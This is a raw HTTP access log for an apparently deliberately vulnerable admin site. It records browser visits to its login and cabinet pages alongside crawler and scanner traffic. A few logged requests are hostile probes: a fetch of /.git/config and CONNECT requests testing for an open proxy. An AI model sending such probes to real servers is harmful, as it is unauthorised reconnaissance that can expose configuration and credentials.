Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33162
Path: /login
URL: /login
Method: GET
[2026-02-27 17:16:55] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/cabinet?user=17
X-Forwarded-Proto: https
Via: 1.1 Caddy
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.141.21.178
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33162
Path: /static/cabinet.js
URL: /static/cabinet.js
Method: GET
[2026-02-27 17:15:32] === HTTP Request ===
[2026-02-27 17:15:32] Cabinet page accessed - user_id: 17, IP: 172.30.0.12:33162
===================
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Authorization: Bearer Bearer eyJhbGciOiJIU...
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: */*
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/login
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.141.21.178
Accept-Encoding: gzip, deflate, br, zstd
Via: 1.1 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33162
Query: user=17
Path: /cabinet
URL: /cabinet?user=17
Method: GET
[2026-02-27 17:15:32] === HTTP Request ===
[2026-02-27 17:14:16] Login page accessed - IP: 172.30.0.12:33162
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.141.21.178
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33162
Path: /login
URL: /login
Method: GET
[2026-02-27 17:14:16] === HTTP Request ===
===================
X-Forwarded-For: 178.141.21.178
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Host: admin.vulnberries.ru
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33162
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 17:14:16] === HTTP Request ===
===================
X-Forwarded-For: 178.141.21.178
Via: 1.1 Caddy
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/css,*/*;q=0.1
Sec-Fetch-Dest: style
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33146
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-27 17:14:16] === HTTP Request ===
===================
X-Forwarded-Proto: https
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.141.21.178
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33146
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-27 17:14:16] === HTTP Request ===
[2026-02-27 17:14:16] Main page accessed - IP: 172.30.0.12:33146
===================
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Upgrade-Insecure-Requests: 1
Sec-Fetch-Site: none
X-Forwarded-For: 178.141.21.178
Sec-Fetch-User: ?1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Ch-Ua-Mobile: ?0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Via: 1.1 Caddy
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33146
Path: /
URL: /
Method: GET
[2026-02-27 17:14:16] === HTTP Request ===
[2026-02-27 17:13:06] Main page accessed - IP: 176.65.149.45:34990
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:34990
Path: /
URL: /
Method: GET
[2026-02-27 17:13:06] === HTTP Request ===
[2026-02-27 16:48:36] Main page accessed - IP: 87.236.176.131:58173
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: bloodthirstypiggy.ru:8081
RemoteAddr: 87.236.176.131:58173
Path: /
URL: /
Method: GET
[2026-02-27 16:48:36] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 155.212.174.121:39970
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 15:28:03] === HTTP Request ===
[2026-02-27 15:28:03] Main page accessed - IP: 155.212.174.121:39964
===================
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 155.212.174.121:39964
Path: /
URL: /
Method: GET
[2026-02-27 15:28:03] === HTTP Request ===
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 155.212.174.121:39952
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 15:28:03] === HTTP Request ===
[2026-02-27 15:28:03] Main page accessed - IP: 155.212.174.121:39936
===================
User-Agent: Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 155.212.174.121:39936
Path: /
URL: /
Method: GET
[2026-02-27 15:28:03] === HTTP Request ===
===================
Accept: */*
X-Openai-Host-Hash: 867116608
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 74.7.244.26
From: oai-searchbot(at)openai.com
Accept-Encoding: gzip, br, deflate
X-Forwarded-Proto: https
Via: 2.0 Caddy
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:35362
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-27 15:16:52] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.148.10.23:55000
Path: /.git/config
URL: /.git/config
Method: GET
[2026-02-27 14:28:09] === HTTP Request ===
[2026-02-27 13:54:50] Main page accessed - IP: 34.78.60.61:52462
===================
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.78.60.61:52462
Path: /
URL: /
Method: GET
[2026-02-27 13:54:50] === HTTP Request ===
[2026-02-27 13:21:40] Main page accessed - IP: 172.30.0.12:50268
===================
X-Forwarded-For: 195.211.77.141
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50268
Path: /
URL: /
Method: GET
[2026-02-27 13:21:40] === HTTP Request ===
[2026-02-27 13:21:05] Main page accessed - IP: 172.30.0.12:50268
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 195.211.77.141
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:50268
Path: /
URL: /
Method: HEAD
[2026-02-27 13:21:05] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: google.com:443
RemoteAddr: 137.184.229.167:58776
Path:
URL: //google.com:443
Method: CONNECT
[2026-02-27 13:02:08] === HTTP Request ===
[2026-02-27 12:22:11] Main page accessed - IP: 205.210.31.42:60470
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 205.210.31.42:60470
Path: /
URL: /
Method: GET
[2026-02-27 12:22:11] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CyberOKInspect/1.0; +``https://www.cyberok.ru/policy.html)
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38:8081
RemoteAddr: 85.142.100.134:58180
Path: /containers/
URL: /containers/
Method: GET
[2026-02-27 12:12:10] === HTTP Request ===
===================
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: google.com:443
RemoteAddr: 137.184.229.167:53090
Path:
URL: //google.com:443
Method: CONNECT
[2026-02-27 11:46:59] === HTTP Request ===
[2026-02-27 09:16:53] Main page accessed - IP: 205.210.31.168:61840
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: livepoll.ru
RemoteAddr: 205.210.31.168:61840
Path: /
URL: /
Method: GET
[2026-02-27 09:16:53] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:50290
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-02-27 08:07:04] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:57354
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 08:06:27] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.153.112:57340
Path: *
URL: *
Method: PRI
[2026-02-27 08:06:26] === HTTP Request ===
[2026-02-27 08:06:24] Main page accessed - IP: 66.132.153.112:57328
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.153.112:57328
Path: /
URL: /
Method: GET
[2026-02-27 08:06:24] === HTTP Request ===
[2026-02-27 08:03:29] Main page accessed - IP: 205.210.31.238:61034
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me
RemoteAddr: 205.210.31.238:61034
Path: /
URL: /
Method: GET
[2026-02-27 08:03:29] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.120.49.84
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=1, i
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/login
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49764
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 06:56:50] === HTTP Request ===
[2026-02-27 06:56:50] Login page accessed - IP: 172.30.0.12:49764
===================
X-Forwarded-Proto: https
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br, zstd
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 178.120.49.84
Priority: u=0, i
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Upgrade-Insecure-Requests: 1
Referer: https://admin.vulnberries.ru/
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49764
Path: /login
URL: /login
Method: GET
[2026-02-27 06:56:50] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-For: 178.120.49.84
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Ch-Ua-Platform: "macOS"
Referer: https://admin.vulnberries.ru/
Priority: u=1
Accept: */*
Sec-Fetch-Dest: script
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Sec-Fetch-Mode: no-cors
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49764
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 06:56:49] === HTTP Request ===
===================
Accept: */*
X-Forwarded-For: 178.120.49.84
Via: 2.0 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Ch-Ua-Mobile: ?0
Referer: https://admin.vulnberries.ru/
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Encoding: gzip, deflate, br, zstd
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=1
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49740
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-27 06:56:49] === HTTP Request ===
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Accept: text/css,*/*;q=0.1
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.49.84
Via: 2.0 Caddy
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/
Priority: u=0
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49740
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-27 06:56:49] === HTTP Request ===
[2026-02-27 06:56:49] Main page accessed - IP: 172.30.0.12:49740
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
X-Forwarded-For: 178.120.49.84
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Mode: navigate
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Priority: u=0, i
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Sec-Ch-Ua-Platform: "macOS"
X-Forwarded-Host: admin.vulnberries.ru
Via: 2.0 Caddy
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:49740
Path: /
URL: /
Method: GET
[2026-02-27 06:56:49] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 1.1 Caddy
Referer: https://admin.vulnberries.ru/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Proto: https
X-Forwarded-For: 178.141.21.178
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Accept-Encoding: gzip, deflate, br, zstd
Sec-Fetch-Dest: image
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55898
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 06:52:18] === HTTP Request ===
[2026-02-27 06:52:18] Login page accessed - IP: 172.30.0.12:55898
===================
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.141.21.178
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Dest: document
Sec-Ch-Ua-Platform: "Windows"
Referer: https://admin.vulnberries.ru/
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55898
Path: /login
URL: /login
Method: GET
[2026-02-27 06:52:18] === HTTP Request ===
===================
X-Forwarded-For: 178.141.21.178
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/
Via: 1.1 Caddy
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Host: admin.vulnberries.ru
Sec-Ch-Ua-Platform: "Windows"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-Proto: https
Sec-Fetch-Dest: script
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55898
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-27 06:52:17] === HTTP Request ===
===================
X-Forwarded-For: 178.141.21.178
Sec-Fetch-Site: same-origin
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Referer: https://admin.vulnberries.ru/
Via: 1.1 Caddy
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55898
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-27 06:52:17] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: same-origin
Referer: https://admin.vulnberries.ru/
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/css,*/*;q=0.1
X-Forwarded-Proto: https
Via: 1.1 Caddy
Sec-Fetch-Dest: style
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
X-Forwarded-For: 178.141.21.178
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55898
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-27 06:52:17] === HTTP Request ===
[2026-02-27 06:52:17] Main page accessed - IP: 172.30.0.12:55898
===================
X-Forwarded-Host: admin.vulnberries.ru
Sec-Fetch-Site: none
Sec-Fetch-Dest: document
Sec-Ch-Ua-Mobile: ?0
X-Forwarded-Proto: https
X-Forwarded-For: 178.141.21.178
Accept-Encoding: gzip, deflate, br, zstd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Via: 1.1 Caddy
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-User: ?1
Sec-Fetch-Mode: navigate
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:55898
Path: /
URL: /
Method: GET
[2026-02-27 06:52:17] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.113
Via: 1.1 Caddy
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:40894
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-27 06:11:18] === HTTP Request ===
[2026-02-27 06:11:12] Main page accessed - IP: 172.30.0.12:40894
===================
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.113
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
